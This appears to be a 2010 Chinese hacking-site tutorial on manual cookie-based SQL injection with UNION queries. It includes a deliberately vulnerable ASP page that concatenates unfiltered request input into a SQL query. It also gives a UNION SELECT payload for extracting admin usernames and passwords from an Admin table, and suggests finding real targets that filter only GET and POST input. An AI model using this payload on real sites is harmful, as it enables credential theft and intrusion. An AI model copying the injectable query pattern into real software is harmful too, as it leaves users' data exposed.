热门关键字:   网站安全  黑客攻防  安全漏洞  系统安全  网络安全
站外
广告
域名申请虚拟主机 信息安全 域名注册 云主机 网络安全技术 企业网络安全 站外
广告
文字广告位招租 文字广告位招租 文字广告位招租 文字广告位招租 云安全

手工Cookie注入与联合查询的注入演示

发布时间:2010-08-14 10:21文章来源:网络文章作者:小丸子客客 点击次数:
摘要:具体的原理与分析过程我就不写了,写起来一大片,大家看的心烦我写的头痛,我就讲操作过程中的细节。隐私报告里设置处需要接受所有的cookie将安全降低。 cookie值是连接后才保存到本机的,也就是关IE后. 前提条件: 一、网站没有过滤cookie方式的注入。 二、...

 

具体的原理与分析过程我就不写了,写起来一大片,大家看的心烦我写的头痛,我就讲操作过程中的细节。隐私报告里设置处需要接受所有的cookie将安全降低。



cookie值是连接后才保存到本机的,也就是关IE后.
前提条件:

一、网站没有过滤cookie方式的注入。


二、需事前了解数据库的管理员表段名,计算一下注入文件数据库查询语句在数据库中的列数。
打开数据库,找到Product这个表名,计算字段数为21个。管理员表名为admin 用户与密码字段名为username、password,呵呵没有注入文件,我们可以自己构造一个测试方便大家的理解。



构造如下简单注入ASP,当然我没作什么严格的过滤,也就是接受任何方式的提交。.

  1. <!--#include file="Inc/conn.asp" --> //调用数据库连接文件 
  2. <
  3. dim ID,sql,rs //定义函数 
  4. ID=trim(request("ID")) //接受任何形式的提交去空 
  5. if Id="" then //id为空的跳转 
  6. response.Redirect("Product.asp") 
  7. end if 
  8. sql="select * from Product where ID=" & ID & "" //记录集查询语句 
  9. Set rsServer.CreateObject("ADODB.Recordset") //调用查询语句,跳到记录集id所在的指针 
  10. rs.open sql,conn,1,3 //增加记录的表达方式 1,3可读写, 乐观锁定 
  11. if rs.bof and rs.eof then //提示 BOF 或 EOF,程序出错判断 
  12. response.Write("<p>找不到此产品</p>") 
  13. else 
  14. %> 
  15. <p><%=rs("Title")%></p> //反回指针处的内容,选取的字段与管理员的用户密码类型要相同 
  16. <p><%=rs("product_id")%></p> 
  17. <p><%=rs("Price")%></p> 
  18. <
  19. end if 
  20. rs.close //清空 
  21. set rs=nothing 
  22. call CloseConn 
  23. %> 


找前图中的ID=55



构造联合查询语句
and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 from Admin 将6,2分别用username、password替换



来试试cookie注入。找个目标,注入点结构与前面相近就不再分析了,仅过滤了post与get注入.


标签分类: 注入攻击 脚本渗透

上一篇:rar上传文件的一种新突破
下一篇:php一句话后门与隐藏